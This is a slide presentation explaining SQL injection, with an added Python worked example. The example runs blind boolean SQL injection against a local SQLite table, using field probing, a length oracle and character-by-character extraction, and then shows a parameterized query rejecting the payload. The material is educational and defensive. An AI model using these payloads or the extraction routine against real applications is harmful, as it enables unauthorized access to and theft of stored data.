SQL injection - PowerPoint PPT Presentation
SQL injection

Figure 1

By Kaveri Bhasin

Motive of SQL Injection
  • Obtain data from the database
  • Modify system functions (run statements or database functions the application never intended to expose)
  • Insert data into the backend database

Figure 2
Victims

Mostly web applications that build SQL queries from user-supplied input.

Simplest Procedure
  • Guess field names.
  • Construct a query using the guessed name and check the SQL status of the response.
  • If the server returns an error, the field name is incorrect; otherwise the guess was right, so

let's proceed…

Cont.
  • With the correct field name, construct the SQL query and inject it

Example (appended to a numeric input value, here 101):

101 AND Len(( SELECT first_name FROM user_data WHERE userid =15613)) = 6

The application returns its normal result for 101 only if the injected condition is true, so the length of user 15613's first name is learned from a true/false response, one guess at a time, without any data being displayed. Once the length is known, the same trick is repeated on each character.

Paper overview
  • Types of Vulnerabilities
  • Measures
  • Tools (Webgoat)
Types of vulnerabilities
  • Vulnerabilities in the database system itself
  • Incorrect type handling (a numeric field is not checked to be numeric, so a boolean expression can follow the number without any quote)
  • Incorrectly filtered escape characters (quotes in user input are concatenated into the query unescaped)
Measures
  • Web application design: analyze the design against these vulnerabilities
  • Use strongly defined types and validation for user input
  • Use parameterized queries, so user input is bound as a value and never parsed as SQL
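A worked example, added here and not part of the original slides, that ties the "Simplest Procedure" slides to the measures above. It builds a small in-memory SQLite table using the user_data / first_name / userid names from the earlier query (the rows are constructed), runs the procedure against a lookup that concatenates its input (field-name probing, then the length probe from the slide, then character-by-character recovery of the name), and shows the same payload being refused by a lookup that enforces the input type and uses a parameterized query. SQLite's length() stands in for the Len() in the slide; the table contents, the function names and the choice of 101 as the injection point are assumptions.

```python
import sqlite3


def build_db():
    """Constructed sample data: the names follow the slide's query, the rows are made up."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE user_data (userid INTEGER PRIMARY KEY, first_name TEXT);
        INSERT INTO user_data VALUES (101, 'Joe');
        INSERT INTO user_data VALUES (15613, 'Dennis');
    """)
    return con


def lookup_vulnerable(con, account):
    """Incorrect type handling: the numeric input is pasted into the SQL text,
    so a whole boolean expression rides in after the number without any quote."""
    sql = "SELECT first_name FROM user_data WHERE userid = " + str(account)
    return [row[0] for row in con.execute(sql)]


def lookup_parameterized(con, account):
    """The slide's measures: enforce the declared type, then bind it as a parameter
    so the value can never be parsed as SQL."""
    account = int(account)          # raises ValueError for '101 AND ...'
    sql = "SELECT first_name FROM user_data WHERE userid = ?"
    return [row[0] for row in con.execute(sql, (account,))]


def field_exists(con, field):
    """Step 1 of the procedure: probe a guessed column name. A wrong guess makes the
    server error (an error page or HTTP 500 in a web app); a right one returns normally."""
    try:
        lookup_vulnerable(con, f"101 AND {field} IS NOT NULL")
        return True
    except sqlite3.OperationalError:
        return False


def oracle(con, condition):
    """Boolean oracle: account 101's row comes back only when the injected condition holds."""
    return len(lookup_vulnerable(con, f"101 AND ({condition})")) > 0


def blind_extract(con, target_userid, max_len=32):
    """Recover the first_name of target_userid one true/false answer at a time."""
    name_query = f"(SELECT first_name FROM user_data WHERE userid = {target_userid})"
    # Length probe, exactly the slide's Len(...) = 6 idea (length() is SQLite's Len()).
    length = next((n for n in range(1, max_len + 1)
                   if oracle(con, f"length({name_query}) = {n}")), None)
    if length is None:              # no such user, or longer than max_len
        return None
    chars = []
    for pos in range(1, length + 1):
        # Binary search the character code within printable ASCII: about 7 queries per character.
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(con, f"unicode(substr({name_query}, {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def hardened_rejects(con, payload):
    """True when the type-checked, parameterized lookup refuses the payload."""
    try:
        lookup_parameterized(con, payload)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = build_db()
    print("first_name column exists:", field_exists(db, "first_name"))
    print("firstname column exists:", field_exists(db, "firstname"))
    print("blind-extracted name for 15613:", blind_extract(db, 15613))
    print("hardened lookup rejects payload:", hardened_rejects(db, "101 AND 1=1"))
```

Note that the attack never sees a single row of user 15613's data in a response; it only watches whether account 101's normal result appears, which is why output encoding or hiding error messages alone does not stop it, while the parameterized lookup makes the question impossible to ask.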
Tools
  • WebGoat

Developed by OWASP (owasp.org).

A free, deliberately insecure application for experimenting with and learning about SQL injection.

Conclusion

SQL injection is a serious concern.

A single design error, such as one query built by concatenating user input, can be disastrous for the security of sensitive information.

References
  • Figure 1: http://ocliteracy.com/techtips/sql-injection.html
  • Figure 2: Zhi Jian Zhu and Mohammad Zulkernine, "Towards an Aspect-Oriented Intrusion Detection Framework"
  • http://www.owasp.org/
  • http://www.spidynamics.com/papers/SQLInjectionWhitePaper.pdf